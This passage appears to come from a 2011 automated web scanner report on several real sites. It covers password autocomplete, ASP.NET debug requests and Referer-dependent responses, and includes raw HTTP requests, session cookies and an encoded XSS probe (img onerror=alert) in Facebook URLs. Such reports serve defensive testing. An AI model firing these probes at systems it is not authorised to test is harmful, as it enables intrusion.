Content-Length: 267405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB174" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...

12.91. https://www.godaddy.com/domains/search.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/domains/search.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB174

The form contains the following password field with autocomplete enabled:

password

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB174" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...

12.92. https://www.godaddy.com/gdshop/hosting/landing.asp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWB174

The form contains the following password field with autocomplete enabled:

password

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWB174" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...

12.93. http://www.marketwatch.com/News/Story/Story.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/News/Story/Story.aspx

Issue detail

The page contains a form with the following action URL:

https://secure.marketwatch.com/user/account/logon

The form contains the following password field with autocomplete enabled:

password

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</p><form method="post" action="https://secure.marketwatch.com/user/account/logon">
   <div>
...[SNIP]...
<br/>
           <input type="password" name="password" value="" class="text password"/>
       </p>
...[SNIP]...

12.94. http://www.marketwatch.com/News/Story/Story.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/News/Story/Story.aspx

Issue detail

The page contains a form with the following action URL:

https://secure.marketwatch.com/user/account/logon

The form contains the following password field with autocomplete enabled:

password

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</p><form method="post" action="https://secure.marketwatch.com/user/account/logon">
   <div>
...[SNIP]...
<br/>
           <input type="password" name="password" value="" class="text password"/>
       </p>
...[SNIP]...

12.95. http://www.marketwatch.com/News/Story/Story.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/News/Story/Story.aspx

Issue detail

The page contains a form with the following action URL:

https://secure.marketwatch.com/user/account/logon

The form contains the following password field with autocomplete enabled:

password

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
</a><form method="post" action="https://secure.marketwatch.com/user/account/logon">
   <div>
...[SNIP]...
<br/>
           <input type="password" name="password" value="" class="text password"/>
       </p>
...[SNIP]...

12.96. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The page contains a form with the following action URL:

http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

The form contains the following password field with autocomplete enabled:

AuthorPassword

Request

Response

12.97. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page contains a form with the following action URL:

http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545

The form contains the following password field with autocomplete enabled:

AuthorPassword

Request

Response

12.98. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page contains a form with the following action URL:

http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

The form contains the following password field with autocomplete enabled:

AuthorPassword

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:42 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999990
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 83656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>

<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
<div id="cmttabs">
...[SNIP]...
<br />
<input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

13. ASP.NET debugging enabled previous next
There are 2 instances of this issue:

http://www.eyewonderlabs.com/Default.aspx
http://www.pageflakes.com/Default.aspx

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

13.1. http://www.eyewonderlabs.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eyewonderlabs.com
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.eyewonderlabs.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 05 May 2011 10:56:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

13.2. http://www.pageflakes.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pageflakes.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pageflakes.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 05 May 2011 11:16:01 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

14. Referer-dependent response previous next
There are 13 instances of this issue:

http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd
http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b
http://www.facebook.com/login.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/policy.php
https://www.facebook.com/
https://www.facebook.com/h02332
https://www.facebook.com/help/contact.php
http://www.huffingtonpost.com/
http://www.tuaw.com/hub/app-reviews

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

14.1. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Request 1

Response 1

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=hrTlo; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.40.55
X-Cnection: close
Date: Thu, 05 May 2011 11:29:43 GMT
Content-Length: 11493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="mR5p";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." />
<link rel="alternate" media="handheld" href="http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd" />
<title>Page Not Found | Facebook</title><noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css
...[SNIP]...

Request 2

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=mTzzT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.97.25
X-Cnection: close
Date: Thu, 05 May 2011 11:29:58 GMT
Content-Length: 11447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="5zvb";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." />
<link rel="alternate" media="handheld" href="http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd" />
<title>Page Not Found | Facebook</title><noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/3GUx1LLG0cl.css"
...[SNIP]...

14.2. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Request 1

Response 1

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.102.67
X-Cnection: close
Date: Thu, 05 May 2011 11:56:26 GMT
Content-Length: 11478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="r0x3";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." />
<link rel="alternate" media="handheld" href="http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b" />
<title>Page Not Found | Facebook</title><noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.c
...[SNIP]...

Request 2

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response 2

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.191.67
X-Cnection: close
Date: Thu, 05 May 2011 11:57:33 GMT
Content-Length: 11432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="5Qfi";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." />
<link rel="alternate" media="handheld" href="http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b" />
<title>Page Not Found | Facebook</title><noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/3GUx1LLG0cl.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="te
...[SNIP]...

14.3. http://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/login.php

Request 1

Response 1

Request 2

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
